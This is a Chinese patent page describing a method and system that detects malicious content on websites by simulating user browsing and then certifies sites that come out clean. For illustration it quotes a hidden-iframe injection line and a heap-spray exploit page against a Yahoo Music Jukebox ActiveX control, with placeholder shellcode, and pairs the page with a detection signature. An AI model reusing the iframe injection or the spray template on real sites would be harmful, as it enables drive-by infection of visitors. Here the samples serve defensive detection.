CN101340434A - 网站恶意内容检测与认证方法及系统 - Google Patents
网站恶意内容检测与认证方法及系统 Download PDFInfo
- Publication number
- CN101340434A CN101340434A CNA2008100981312A CN200810098131A CN101340434A CN 101340434 A CN101340434 A CN 101340434A CN A2008100981312 A CNA2008100981312 A CN A2008100981312A CN 200810098131 A CN200810098131 A CN 200810098131A CN 101340434 A CN101340434 A CN 101340434A
- Authority
- CN
- China
- Prior art keywords
- content
- website
- targeted website
- hostile
- engine
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
Images
Landscapes
- Information Transfer Between Computers (AREA)
Abstract
本发明公开了一种网站恶意内容检测与认证方法和系统,用于检测目标网站中是否存在恶意内容,其中:数据采集引擎以模拟用户行为的方式来对目标网站上的内容进行采集;本地数据库存储采集到的内容;恶意内容分析引擎对存储下来的内容进行分析以检测其中是否存在恶意内容;认证授权数据库存储分析结果;反馈引擎将存在恶意内容的分析结果反馈给目标网站;认证授权引擎在不存在恶意内容时对目标网站授予通过认证的标志。利用本发明能够实时分析用户访问目标网站时可能接触到的所有文件,无论其是否存放于该目标网站的服务器上;并且,利用本发明无需在目标网站的服务器和设备上安装任何硬件或软件,并且不会对目标网站服务器有任何性能上的影响。
Description
技术领域
本发明涉及网络安全领域,尤其涉及网站恶意内容检测与认证方法及系统,用于检测目标网站上是否存在恶意内容,所述目标网站即被检测的网站。
背景技术
目前,网络已被普遍应用,网络上的各个网站为人们获取信息或进行联络提供了极大的方便。但是,使用网络也存在着种种风险,例如,人们在浏览某些网站的网页时可能使自己的电脑感染病毒、在下载文件时也可能同时下载了不希望的病毒或者其它恶意软件。
为了保障网站安全,目前申请号为PCT/US2004/032100的国际申请公开了一种在线服务实时安全认证方法(“METHOD ANDAPPARATUS FOR REAL-TIME SECURITY VERIFICATION OFON-LINE SERVICES”),其基本原理为:对网站所在服务器系统和相关设备进行漏洞扫描,扫描对象包括网站程序、网站服务器上开启的诸如FTP和数据库服务器的其它服务等等。
然而,申请号为PCT/US2004/032100的国际申请本身存在的主要问题如下:1)只关心网站系统是否存在缺陷/漏洞,而不关心网站是否包含对用户有害的恶意内容,而网站是否存在漏洞是不能与网站是否包含恶意内容划等号的;2)只能对一些已知的缺陷/漏洞进行扫描检测,对未知漏洞无法检测;3)并不是所有已知缺陷/漏洞都有固定特征并可以进行远程检测,事实上很多漏洞无法进行远程精确扫描检测,因而会造成漏报;4)对网站服务进行扫描可能对网站业务造成不可预测的损害,例如服务器宕机、业务中断,从而使用户无法进行正常访问等等。
然而在实际应用中,并不是所有的漏洞都可以远程检测到,而且即便网站不存在软件和硬件上的漏洞,也有可能因为管理不当或者其它人为因素(比如网站内部某些管理人员蓄意或者无意的违规操作),导致网站被入侵或者被加入恶意内容,这些都不能够被远程漏洞扫描所检测到。
而且,事实上很多恶意内容链接自其它网站。例如,目前很多用户在浏览网站时或者下载安装软件后,计算机就会感染病毒或被木马软件控制,其根本原因就是,很多网站安全性不够高,被恶意黑客以各种手段入侵,并在网站的网页代码中插入一些链接,指向自己控制的恶意代码,在用户浏览或者下载后,计算机即被感染。又如,随着网络的普及和网上交易的流行,很多以盈利为目的的恶意黑客把目标投向了窃取用户个人敏感资料,如网上银行账号密码、游戏密码、游戏装备及电子邮箱密码等等。而根据安全公司研究表明,目前恶意黑客利用的最多的方式,就是通过入侵网站在网站中加入恶意内容,从而感染和控制访问此网站的用户电脑。黑客加入的恶意内容,可能只是一个超链接,也可能是在用户要下载的软件中直接捆绑木马病毒程序等等。而申请号为PCT/US2004/032100的国际申请对于这些由非漏洞原因引起的服务器内容遭到篡改被加入恶意内容等情况无法进行检测。
保证网络安全的另外一项技术是利用杀毒软件。但杀毒软件只能查杀存在于服务器上的病毒和恶意软件,而根据目前的网络攻击方式和特点,这些病毒和恶意软件往往并不会被存放在目标服务器上,而只是以链接的方式将用户重定向到存在病毒和恶意软件的其它网站,所以杀毒软件对此无从检测。而且,在服务器上安装杀毒软件,通常会对服务器性能造成很大影响。
因此,目前没有针对网站恶意内容进行实时检测并进行认证的方法和系统。
发明内容
鉴于上述问题,本发明的目的在于提供一种网站恶意内容检测方法及系统,以便对目标网站上的恶意内容进行检测认证从而保证网络安全。
因此,本发明提供一种网站恶意内容检测与认证方法:用于检测目标网站中是否存在恶意内容,该方法包括:步骤100,以模拟用户行为的方式来对目标网站上的内容进行采集;步骤200,存储所述采集到的内容;步骤300,对所述存储下来的内容进行分析以检测其中是否存在恶意内容,然后将所述分析结果存储下来,在存在恶意内容的情况下,执行步骤400,而在不存在恶意内容的情况下,执行步骤500;步骤400,将所述存在恶意内容的分析结果反馈给所述目标网站以便目标网站对恶意内容进行相应处理;步骤500,对所述目标网站授予通过认证的标志。
优选地,在步骤300中利用特征匹配方式、智能化启发方式以及授权的杀毒软件中的至少其中一种方式来对所述存储下来的内容进行分析。
进一步地,在步骤300中被分析的内容包括网页、脚本代码、软件、多媒体内容和下载内容中的至少其中一种。
优选地,在步骤300中根据预定的不同检测等级来确定待检测的内容。
进一步地,步骤400通过向目标网站发送E-mail、短信、即时消息或打电话以便将分析结果反馈给所述目标网站。
优选地,步骤500中所述的通过认证的标志位于所述目标网站上,并且该标志依照步骤300中得到的该目标网站的分析结果的不同而变化,所述标志以超文本传输协议方式通过一个认证授权网站链接到所述目标网站的分析结果,以便在用户点击该标志时显示所述分析结果。
优选地,针对该目标网站以一定时间间隔重复执行该方法,并且,在该目标网站先前已被授予通过认证的标志并且在之后的检测中发现其中含有恶意内容的情况下,撤销所述通过认证的标志。
优选地,对目标网站中用户访问频率较高的网页以高频率进行检测。
本发明还提供一种网站恶意内容检测与认证系统:其用于检测在目标网站上是否存在恶意内容,包括:数据采集引擎,用于以模拟用户行为的方式来对所述目标网站上的内容进行采集;本地数据库,用于存储由数据采集引擎采集到的内容;恶意内容分析引擎,用于对存储于所述本地数据库中的内容进行分析以检测其中是否存在恶意内容;认证授权数据库,用于存储来自恶意内容分析引擎的是否存在恶意内容的分析结果;反馈引擎,用于在存在恶意内容的情况下,将来自所述恶意内容分析引擎的分析结果反馈给所述目标网站以便目标网站对恶意内容进行相应处理;认证授权引擎,用于在不存在恶意内容的情况下,对所述目标网站授予通过认证的标志。
进一步地,所述恶意内容分析引擎中包括特征匹配分析单元、智能化启发分析单元以及授权的杀毒软件中的至少其中一种以便对存储于所述本地数据库中的内容进行分析。
进一步地,所述恶意内容分析引擎分析的内容包括网页、脚本代码、软件、多媒体内容和下载内容的至少其中一种。
优选地,根据不同的检测等级来选择待检测的内容。
进一步地,所述反馈引擎中包括:E-mail、短信、即时消息发送单元或电话以便将分析结果反馈给所述目标网站。
优选地,所述认证授权引擎维护着认证授权网站,所述认证授权网站与所述认证授权数据库相联系,并且所述通过认证的标志为包含在目标网站中的链接到所述认证授权网站的超链接,以便正在访问目标网站的用户能够通过点击该超链接而连接到所述认证授权网站而获得该目标网站的分析结果从而确认其认证授权状态。
进一步地,用户利用认证授权网站查询所有目标网站的认证授权状态。
优选地,该系统以预定时间间隔针对该目标网站进行恶意内容检测分析,所述认证授权引擎中还包括认证标志撤销单元,在该目标网站先前已被授予通过认证的标志并且在之后的检测中发现其中含有恶意内容时,所述认证标志撤销单元撤销所述通过认证的标志。
与申请号为PCT/US2004/032100的国际申请针对缺陷/漏洞不同,本发明针对的是用户在浏览和使用网站中可能接触到的网站内容,如网页、软件、多媒体内容及各种下载,着重检测这些内容中是否包含恶意内容,是否会对用户造成伤害,诸如计算机感染病毒、计算机被恶意入侵、账户密码被盗及信息泄露等等。利用本发明能够实时分析在用户访问网站时可能接触的到的所有文件,无论其是否存放于该网站的服务器上(例如也可能链接自其它网站的内容)。并且,本发明的系统能够模拟人工浏览、智能获取用户可能接触到的所有网站内容并存入本地数据库中进行综合分析,而无需在网站服务器和设备上安装任何硬件或软件,并且不会对网站业务造成任何损害或者中断,也不会对网站服务器有任何性能上的影响。
因而,对于普通用户来说,本发明可以确保其在访问通过本发明检测认证的网站时,其计算机系统不会因网站内容受到病毒感染、木马控制或者信息泄露等。
附图说明
图1为本发明系统的的示意性框图;
图2为本发明方法的流程框图。
具体实施方式
本发明的基本原理是,通过一个自行研发的分析系统,对网站提供的内容(网页、软件、多媒体、各种下载等等)进行实时的远程分析,判断其中是否包含对用户有害的恶意内容。如无恶意内容,则可以在该网站上放置一个表明其中无恶意内容的统一标识;如发现恶意内容,系统可以向网站反馈问题,帮助其及时更正问题,如不能及时改正,即取消其在网站放置的标识。
本发明与申请号为PCT/US2004/032100的国际申请之间最大的区别就在于,本发明并不远程检测网站是否存在漏洞,也不关心网站是因何种原因而被入侵,甚至是否已经被入侵。本发明关心的是,网站是否被加入了恶意内容,恶意内容可能是黑客入侵造成的,也可能不是。
下面结合附图对本发明的系统和方法进行详细说明。
本发明分析检测的对象即目标网站为如图1中的网站101,其中可能包括网页、软件、多媒体、文档等,用户301可能访问网站101,如果网站101中包括恶意内容,则用户301的电脑可能受到感染病毒、账户信息泄露等破坏。
如图1所示,本发明的系统包括:数据采集引擎201,用于以模拟用户行为的方式来采集网站101上的内容,这些内容既包括采集自网站101本身的内容,也包括采集自网站101上的链接地址的网页上的相关内容;本地数据库202,用于存储由数据采集引擎201采集到的内容;恶意内容分析引擎203,用于对存储于本地数据库202中的内容进行分析以检测其中是否存在恶意内容;认证授权数据库205,其用于存储在网站上是否发现恶意内容的分析结果;反馈引擎204,用于将来自恶意内容分析引擎203的分析结果反馈给网站101;认证授权引擎206,其用于当恶意内容分析引擎203未在网站101的内容中发现恶意内容时,对网站101进行认证授权以标识其安全性较好。
本发明的一个典型的实施例详细描述如下。
网站101可能是一个电子商务网站,也可能是一个网上银行,新闻门户网站或者博客等等。由于网站101可能存在种种软件、硬件或者管理上的漏洞,导致网站101被恶意黑客入侵,并在网站101的网页或者下载软件等内容中加入一些恶意内容。这些恶意内容,在被用户301浏览或者下载执行之后,可能导致用户301的计算机被病毒感染、用户个人信息泄露、被盗或资料丢失等等。
在本发明方法的步骤100中,本发明系统中的数据采集引擎201可以通过智能模拟用户浏览网站的行为,远程采集用户301在访问和使用网站101的过程中,可能浏览、下载或者使用到的内容。
所述数据采集引擎201可以是一套自主开发程序和开源程序相结合的系统201.exe。数据采集引擎201可以根据操作人员输入的参数对目标网站进行分析。例如,根据操作人员输入的参数确定:1)采集哪些URL和哪些目录下的内容;2)采集何种类型的内容:是HTML网页、多媒体文件还是软件,抑或全部采集。
数据采集引擎201可以采集用户在浏览目标网站时可能接触到的所有内容。数据采集引擎201可以遍历目标网站的所有网页内容,也包括iframe,超链接等等。由于iframe和超链接等HTML属性的特殊性,虽然其链接的内容并不存储在目标网站上,但在用户浏览目标网站时,也会同时浏览或者下载到这些被链接网站的内容,所以数据采集引擎201可以同时获取所有这些内容。
在Windows系统中,数据采集引擎201应用的一个例子是:
C:\201.exe-u http://www.example.com-c ALL-r herf-l 3
在该例中,参数“-u http://www.example.com”用于指定待采集内容的URL地址为“www.example.com”,参数“-c ALL”用于指定待采集的内容类型为所有类型,参数“-r href”代表不采集需要用户点击超链接索引的内容,参数“-l 3”代表采集三级目录以内的内容,不采集更深层的内容。因此利用该例,则数据采集引擎201即201.exe将从URL为www.example.com的目标网站中三级目录以内的全部类型的内容,且不采集需要用户点击超链接才能获得的内容。当然所有这些参数都可以根据检测的级别和类型来相应配置。
这些采集到的内容,可能是网站101的首页网页、新闻网页,也可能是需要用户登录后才能访问的信息系统,也可能是用户会下载使用的软件,也可能是用户会在线收听的音乐,视频,诸如此类。
由于黑客在成功入侵网站101后,采用的最多的手法就是向网站101中加入类似如下的代码:
<iframe src=http://www.网站102.com/abc.htm height=0width=0>
这段代码利用浮动框架技术,使得用户301在访问网站101时,在无法察觉的情况下,也访问了含有恶意内容的网站102。由于浮动框架的特殊性,网站102的内容并不存在于网站101所在服务器上,因此即便是在网站101上安装了一些安全软件,例如杀毒软件等,也很难或者无法检测到此威胁的存在。
但是由于本发明的数据采集引擎201完全模拟用户301的行为,所以即便网站102的内容不存放于网站101所在的服务器,数据采集引擎201依然能够采集到这些会给用户301带来危害的恶意内容。
在步骤100中,数据采集引擎201在采集数据的过程中,不会对网站101造成任何负载或者性能上的损害,其采集行为只相当于一个普通用户301使用该网站的过程。从而可以避免一些远程扫描探测过程中可能造成的宕机、服务中断等问题。
在步骤200中,数据采集引擎201采集到的所有内容被存放到本地数据库202中。本地数据库202可以使用开源的MySQL、也可以使用商用SQL Server或者Oracle数据库。所有采集到的网站101的内容,可以按照一定的格式,存放于本地数据库202中,以便于进行分析和检索。
在步骤300中,恶意内容分析引擎203,从本地数据库202中读取并分析所采集到网站101的内容。其采用的分析算法可以是多种形式,包括但不限于常规的特征匹配和智能化的启发式分析,而且也可以将上述方法结合授权的杀毒软件引擎来分析,以提高准确率。
下面给出一个采用特征匹配方式进行检测的例子。
以下是一个试图利用Yahoo Music Jukebox漏洞的恶意网页的内容:
----------------------分隔符---------------------------------
<html>
<body>
<object
classid=′clsid:5F810AF1-BB5F-4416-BE63-E01DD117BD6C′
id=′obj′></object>
<script>
sc1=unescape(″%u1111%u1111shellcodeblahblah″);
var block1=unescape(″%u0A0A%u0A0A″);
var hsize1=20;
var slspace=hsize1+sc1.length;
while(block1.length<slspace)block1+=block1;
var block=block1.substring(0,block1.length-slspace);
while(block.length+slspace<0x4000)block=block+block+
fillblock;
var buf=″″
for(i=0;i<400;i++){buf=buf+unescape(″%u0A0A″)}
obj.AddButton1(″http://″+buf,1);
</script>
</body>
</html>
----------------------分隔符---------------------------------
一个利用特征匹配的方式检测上面这个漏洞的例子如下:
{
id:1 offset:0;filetype:htm,html,css,asp,php;content:
″clsid:5F810AF1-BB5F-4416-BE63-E01DD117BD6C″
id:2 offset:0;content:″%u1111%u1111″
id:3 offset:0;content:″unescape″
id:4 offset:0;content:″.AddButton1″
}
在这个例子中,首先,恶意内容分析引擎会在指定的所有文件类型(如所有htm、html、css、asp和php文件)中搜索字符串“clsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C”,这是因为该字符串是攻击者利用此漏洞的必要条件之一。另外一个必要条件是id:4里所匹配的″.AddButton1″字符串。此外,字符串″%u1111%u1111″和″unescape″虽不是必要条件,但它们是利用此类漏洞的常见方法和内容。如果能够同时在一个文件里,按照上述指定规则,匹配到这些内容(这个例子倒是一个伪语法的举例,因此在此认为id:2、id:3和id:4都继承了id:1所定义的文件类型,即全部文件类型),即判定此文件中包含恶意内容。当然以上只是为了解释原理而列举的示例,并不代表实际要检测的内容。
为了提高检测效率和检测速度,尤其是在检测恶意软件中包含的恶意内容时,恶意内容分析引擎203可以结合授权杀毒软件引擎进行检测。在这种情况下,恶意内容分析引擎203使用授权杀毒软件引擎开放的接口,调用一些杀毒软件特定的功能和病毒库,来进行检测。
针对黑客攻击的技术趋势,恶意内容分析引擎203分析的重点可以是各种网页和脚本代码,但也可以包括一些其它内容,例如软件、多媒体或各种下载等等。
检测的内容不同,可以对应着不同的检测等级。例如在初级检测等级中,恶意内容分析引擎203只分析网页和脚本内容,而在更高级别的检测中,可以包含对多媒体内容的分析等等。
在恶意内容分析引擎203得到目标网站中是否存在的分析结果之后,分析结果被保存在认证授权数据库205中,分析结果可以包括网站101的名称、分析时间和分析等级等。
当恶意内容分析引擎203在从本地数据库202中读取出的采集自网站101的内容中发现恶意代码时,可以将所发现的恶意内容的详细信息,传递给反馈引擎204。
在步骤400中,反馈引擎204可以及时地向网站101反馈所发现的恶意内容,以帮助其及时更正,以避免对更多访问网站101的用户造成损害。这个反馈过程可以是自动地完成,例如通过自动发送E-mail、短信、即时消息或打电话等方式完成;也可以在人工干预下完成,例如首先由有经验的专业人员进行审核,如问题确实存在,则立即向网站101反馈。
如果恶意内容分析引擎203在从本地数据库202中读取出的采集自网站101的内容中没有发现任何恶意内容,认证授权引擎206可以对网站101进行认证授权。这种认证授权过程可以是以HTTP(超文本传输协议)的方式来完成,也可以通过HTTPS、FTP或者其它方式来完成。
同时,认证授权引擎206可以维护着一个认证授权网站,认证授权网站与所述认证授权数据库相联系,此网站主要是为了方便地向网站101传递和显示认证和授权结果,也方便用户集中在此网站查询所有使用本发明的网站的认证授权状态。
在以HTTP的方式来完成的例子中,网站101可以在网站中的适当位置包含一个到认证授权引擎206所维护的认证授权网站的超链接。此超链接可以显示一个特征鲜明的标志,如画面或标识语,以便正在访问网站101的用户301能够方便清晰地确认网站101的认证授权状态。
如果用户301打开这个超链接,可以以一个弹出窗口的形式被链接到认证授权网站,这个弹出窗口会显示从认证授权数据库205中实时查询到的网站101的认证授权状态,例如,“网站101于北京时间2008年4月2日14:05时通过了检测,网站101不包含任何恶意内容,请放心浏览使用。”
以上的整个采集、分析、反馈和认证的流程,即是完整的本发明的恶意内容检测方法。该过程可以以一定时间间隔重复执行,其重复的频率可以取决于认证授权的等级,例如在认证授权等级较高时每24小时执行一次,也可能每1个小时进行一次。当然也可以采取混合式做法,例如每24小时对网站101的所有内容进行一次检测,但是对于用户访问频率较高的网页,例如网站首页则每5分钟进行一次检测。并且,在该目标网站先前已被授予通过认证的标志并且在之后的检测中发现其中含有恶意内容时,可以撤销所述通过认证的标志。这种撤销可以是改变标志的显示内容,例如,通过认证的标志可以是一个利用java script来显示动态画面的一个图标,这个图标可以根据目标网站的检测分析结果的不同而显示不同的画面以清楚地标志该目标网站的授权认证状态,当然该标志也可以是一个标志语,在这种情况下,可以通过改变标志语的内容来显示该目标网站的授权认证状态,例如在撤销通过认证的标志时可以将标志语“通过认证”改变为“可能含有恶意内容”以提示用户注意。对于该标志的修改可以由目标网站的维护方进行,如通知其修改在网页中嵌入的标志;也可由检测方的认证授权引擎来进行。
以上内容仅是对本发明的示例性的说明,不用于限定本发明的保护范围,本发明的保护范围由权利要求书限定。本领域的技术人员可以在不偏离本发明实质内容的情况下对本发明进行各种修改和等同替换,这些修改和等同替换也应视为落在本发明的保护范围内。
Claims (16)
1、一种网站恶意内容检测与认证方法,用于检测目标网站中是否存在恶意内容,其特征在于,包括:
步骤100,以模拟用户行为的方式来对目标网站上的内容进行采集;
步骤200,存储所述采集到的内容;
步骤300,对所述存储下来的内容进行分析以检测其中是否存在恶意内容,然后将所述分析结果存储下来,在存在恶意内容的情况下,执行步骤400,而在不存在恶意内容的情况下,执行步骤500;
步骤400,将所述存在恶意内容的分析结果反馈给所述目标网站以便目标网站对恶意内容进行相应处理;
步骤500,对所述目标网站授予通过认证的标志。
2、根据权利要求1所述的方法,其特征在于,在步骤300中利用特征匹配方式、智能化启发方式以及授权的杀毒软件中的至少其中一种方式来对所述存储下来的内容进行分析。
3、根据权利要求1或2所述的方法,其特征在于,在步骤300中被分析的内容包括网页、脚本代码、软件、多媒体内容和下载内容中的至少其中一种。
4、根据权利要求3所述的方法,其特征在于,在步骤300中根据预定的不同检测等级来确定待检测的内容。
5、根据权利要求1所述的方法,其特征在于,步骤400通过向目标网站发送E-mail、短信、即时消息或打电话以便将分析结果反馈给所述目标网站。
6、根据权利要求1所述的方法,其特征在于,步骤500中所述的通过认证的标志位于所述目标网站上,并且该标志依照步骤300中得到的该目标网站的分析结果的不同而变化,所述标志以超文本传输协议方式通过一个认证授权网站链接到所述目标网站的分析结果,以便在用户点击该标志时显示所述分析结果。
7、根据权利要求1所述的方法,其特征在于,针对该目标网站以一定时间间隔重复执行该方法,并且,在该目标网站先前已被授予通过认证的标志并且在之后的检测中发现其中含有恶意内容的情况下,撤销所述通过认证的标志。
8、根据权利要求1所述的方法,其特征在于,对目标网站中用户访问频率较高的网页以高频率进行检测。
9、一种网站恶意内容检测与认证系统,其用于检测在目标网站上是否存在恶意内容,其特征在于,包括:
数据采集引擎,用于以模拟用户行为的方式来对所述目标网站上的内容进行采集;
本地数据库,用于存储由数据采集引擎采集到的内容;
恶意内容分析引擎,用于对存储于所述本地数据库中的内容进行分析以检测其中是否存在恶意内容;
认证授权数据库,用于存储来自恶意内容分析引擎的是否存在恶意内容的分析结果;
反馈引擎,用于在存在恶意内容的情况下,将来自所述恶意内容分析引擎的分析结果反馈给所述目标网站以便目标网站对恶意内容进行相应处理;
认证授权引擎,用于在不存在恶意内容的情况下,对所述目标网站授予通过认证的标志。
10、根据权利要求9述的系统,其特征在于,所述恶意内容分析引擎中包括特征匹配分析单元、智能化启发分析单元以及授权的杀毒软件中的至少其中一种以便对存储于所述本地数据库中的内容进行分析。
11、根据权利要求9或10所述的系统,其特征在于,所述恶意内容分析引擎分析的内容包括网页、脚本代码、软件、多媒体内容和下载内容的至少其中一种。
12、根据权利要求11所述的系统,其特征在于,根据不同的检测等级来选择待检测的内容。
13、根据权利要求9所述的系统,其特征在于,所述反馈引擎中包括:E-mail、短信、即时消息发送单元或电话以便将分析结果反馈给所述目标网站。
14、根据权利要求9所述的系统,其特征在于,所述认证授权引擎维护着认证授权网站,所述认证授权网站与所述认证授权数据库相联系,并且所述通过认证的标志为包含在目标网站中的链接到所述认证授权网站的超链接,以便正在访问目标网站的用户能够通过点击该超链接而连接到所述认证授权网站而获得该目标网站的分析结果从而确认其认证授权状态。
15、根据权利要求14所述的系统,其特征在于,用户利用认证授权网站查询所有目标网站的认证授权状态。
16、根据权利要求9所述的系统,其特征在于,该系统以预定时间间隔针对该目标网站进行恶意内容检测分析,所述认证授权引擎中还包括认证标志撤销单元,在该目标网站先前已被授予通过认证的标志并且在之后的检测中发现其中含有恶意内容时,所述认证标志撤销单元撤销所述通过认证的标志。
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN2008100981312A CN101340434B (zh) | 2008-05-15 | 2008-05-15 | 网站恶意内容检测与认证方法及系统 |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN2008100981312A CN101340434B (zh) | 2008-05-15 | 2008-05-15 | 网站恶意内容检测与认证方法及系统 |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN101340434A true CN101340434A (zh) | 2009-01-07 |
| CN101340434B CN101340434B (zh) | 2011-09-07 |
Family
ID=40214388
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN2008100981312A Active CN101340434B (zh) | 2008-05-15 | 2008-05-15 | 网站恶意内容检测与认证方法及系统 |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN101340434B (zh) |
Cited By (19)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102215222A (zh) * | 2011-05-09 | 2011-10-12 | 北京艾普优计算机系统有限公司 | 网站防护方法和装置 |
| CN102332072A (zh) * | 2010-11-01 | 2012-01-25 | 卡巴斯基实验室封闭式股份公司 | 用于检测恶意软件和管理恶意软件相关信息的系统和方法 |
| CN101562618B (zh) * | 2009-04-08 | 2012-03-28 | 深圳市腾讯计算机系统有限公司 | 一种检测网马的方法及装置 |
| CN103297469A (zh) * | 2012-02-25 | 2013-09-11 | 阿里巴巴集团控股有限公司 | 一种网站数据的采集方法及装置 |
| CN103634127A (zh) * | 2012-08-20 | 2014-03-12 | 腾讯科技(深圳)有限公司 | 一种网站挂马预警方法及装置 |
| CN103685254A (zh) * | 2013-12-05 | 2014-03-26 | 奇智软件(北京)有限公司 | 公共账号信息的安全检测方法与服务器 |
| CN104283840A (zh) * | 2013-07-02 | 2015-01-14 | 深圳市腾讯计算机系统有限公司 | 提高网络访问安全性的方法、客户端及系统 |
| CN104506522A (zh) * | 2014-12-19 | 2015-04-08 | 北京神州绿盟信息安全科技股份有限公司 | 漏洞扫描方法及装置 |
| CN104506930A (zh) * | 2014-12-30 | 2015-04-08 | 青岛海信电器股份有限公司 | 一种音视频数据的下载方法及电视终端 |
| CN104717226A (zh) * | 2012-06-06 | 2015-06-17 | 北京奇虎科技有限公司 | 一种针对网址的检测方法及装置 |
| CN105723660A (zh) * | 2013-11-11 | 2016-06-29 | 罗斯伯格系统公司 | 电信系统 |
| CN106021552A (zh) * | 2016-05-30 | 2016-10-12 | 深圳市华傲数据技术有限公司 | 基于人群行为模拟的互联网爬虫并发数据采集方法及系统 |
| CN106685966A (zh) * | 2016-12-29 | 2017-05-17 | 北京奇虎科技有限公司 | 泄露信息的检测方法、装置及系统 |
| CN107342968A (zh) * | 2016-05-03 | 2017-11-10 | 阿里巴巴集团控股有限公司 | 网页服务器的攻击检测方法、装置及系统 |
| CN107810504A (zh) * | 2015-06-15 | 2018-03-16 | 赛门铁克公司 | 基于用户行为确定恶意下载风险的系统和方法 |
| CN107918735A (zh) * | 2017-11-29 | 2018-04-17 | 中科信息安全共性技术国家工程研究中心有限公司 | 一种基于孤岛文件的网页木马检测方法 |
| CN108363925A (zh) * | 2018-03-16 | 2018-08-03 | 北京奇虎科技有限公司 | 网页挖矿脚本的识别方法及装置 |
| CN110572379A (zh) * | 2019-08-29 | 2019-12-13 | 深圳市网域信息安全技术有限公司 | 面向网络安全的可视化大数据态势感知分析系统关键技术 |
| CN112153043A (zh) * | 2020-09-22 | 2020-12-29 | 杭州安恒信息技术股份有限公司 | 一种网站安全检测方法、装置、电子设备和存储介质 |
Family Cites Families (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN1870493A (zh) * | 2006-06-15 | 2006-11-29 | 北京华景中天信息技术有限公司 | 网站安全漏洞扫描方法 |
| CN1866817A (zh) * | 2006-06-15 | 2006-11-22 | 北京华景中天信息技术有限公司 | 网站安全风险评估方法和系统 |
-
2008
- 2008-05-15 CN CN2008100981312A patent/CN101340434B/zh active Active
Cited By (30)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101562618B (zh) * | 2009-04-08 | 2012-03-28 | 深圳市腾讯计算机系统有限公司 | 一种检测网马的方法及装置 |
| CN102332072A (zh) * | 2010-11-01 | 2012-01-25 | 卡巴斯基实验室封闭式股份公司 | 用于检测恶意软件和管理恶意软件相关信息的系统和方法 |
| CN102332072B (zh) * | 2010-11-01 | 2015-03-25 | 卡巴斯基实验室封闭式股份公司 | 用于检测恶意软件和管理恶意软件相关信息的系统和方法 |
| CN102215222A (zh) * | 2011-05-09 | 2011-10-12 | 北京艾普优计算机系统有限公司 | 网站防护方法和装置 |
| CN103297469B (zh) * | 2012-02-25 | 2016-12-14 | 阿里巴巴集团控股有限公司 | 一种网站数据的采集方法及装置 |
| CN103297469A (zh) * | 2012-02-25 | 2013-09-11 | 阿里巴巴集团控股有限公司 | 一种网站数据的采集方法及装置 |
| CN104717226A (zh) * | 2012-06-06 | 2015-06-17 | 北京奇虎科技有限公司 | 一种针对网址的检测方法及装置 |
| CN103634127A (zh) * | 2012-08-20 | 2014-03-12 | 腾讯科技(深圳)有限公司 | 一种网站挂马预警方法及装置 |
| CN104283840B (zh) * | 2013-07-02 | 2019-02-26 | 深圳市腾讯计算机系统有限公司 | 提高网络访问安全性的方法、客户端及系统 |
| CN104283840A (zh) * | 2013-07-02 | 2015-01-14 | 深圳市腾讯计算机系统有限公司 | 提高网络访问安全性的方法、客户端及系统 |
| CN105723660B (zh) * | 2013-11-11 | 2021-01-05 | 罗斯伯格系统公司 | 电信系统 |
| CN105723660A (zh) * | 2013-11-11 | 2016-06-29 | 罗斯伯格系统公司 | 电信系统 |
| CN103685254A (zh) * | 2013-12-05 | 2014-03-26 | 奇智软件(北京)有限公司 | 公共账号信息的安全检测方法与服务器 |
| CN103685254B (zh) * | 2013-12-05 | 2017-11-14 | 奇智软件(北京)有限公司 | 公共账号信息的安全检测方法与服务器 |
| CN104506522B (zh) * | 2014-12-19 | 2017-12-26 | 北京神州绿盟信息安全科技股份有限公司 | 漏洞扫描方法及装置 |
| CN104506522A (zh) * | 2014-12-19 | 2015-04-08 | 北京神州绿盟信息安全科技股份有限公司 | 漏洞扫描方法及装置 |
| US10642985B2 (en) | 2014-12-19 | 2020-05-05 | NSFOCUS Information Technology Co., Ltd. | Method and device for vulnerability scanning |
| CN104506930A (zh) * | 2014-12-30 | 2015-04-08 | 青岛海信电器股份有限公司 | 一种音视频数据的下载方法及电视终端 |
| CN104506930B (zh) * | 2014-12-30 | 2018-05-04 | 青岛海信电器股份有限公司 | 一种音视频数据的下载方法及电视终端 |
| CN107810504A (zh) * | 2015-06-15 | 2018-03-16 | 赛门铁克公司 | 基于用户行为确定恶意下载风险的系统和方法 |
| CN107342968A (zh) * | 2016-05-03 | 2017-11-10 | 阿里巴巴集团控股有限公司 | 网页服务器的攻击检测方法、装置及系统 |
| CN106021552A (zh) * | 2016-05-30 | 2016-10-12 | 深圳市华傲数据技术有限公司 | 基于人群行为模拟的互联网爬虫并发数据采集方法及系统 |
| CN106685966A (zh) * | 2016-12-29 | 2017-05-17 | 北京奇虎科技有限公司 | 泄露信息的检测方法、装置及系统 |
| CN106685966B (zh) * | 2016-12-29 | 2020-08-04 | 北京奇虎科技有限公司 | 泄露信息的检测方法、装置及系统 |
| CN107918735A (zh) * | 2017-11-29 | 2018-04-17 | 中科信息安全共性技术国家工程研究中心有限公司 | 一种基于孤岛文件的网页木马检测方法 |
| CN108363925A (zh) * | 2018-03-16 | 2018-08-03 | 北京奇虎科技有限公司 | 网页挖矿脚本的识别方法及装置 |
| CN108363925B (zh) * | 2018-03-16 | 2021-06-25 | 北京奇虎科技有限公司 | 网页挖矿脚本的识别方法及装置 |
| CN110572379A (zh) * | 2019-08-29 | 2019-12-13 | 深圳市网域信息安全技术有限公司 | 面向网络安全的可视化大数据态势感知分析系统关键技术 |
| CN110572379B (zh) * | 2019-08-29 | 2020-09-18 | 深圳市网域科技技术有限公司 | 面向网络安全的可视化大数据态势感知分析系统关键技术 |
| CN112153043A (zh) * | 2020-09-22 | 2020-12-29 | 杭州安恒信息技术股份有限公司 | 一种网站安全检测方法、装置、电子设备和存储介质 |
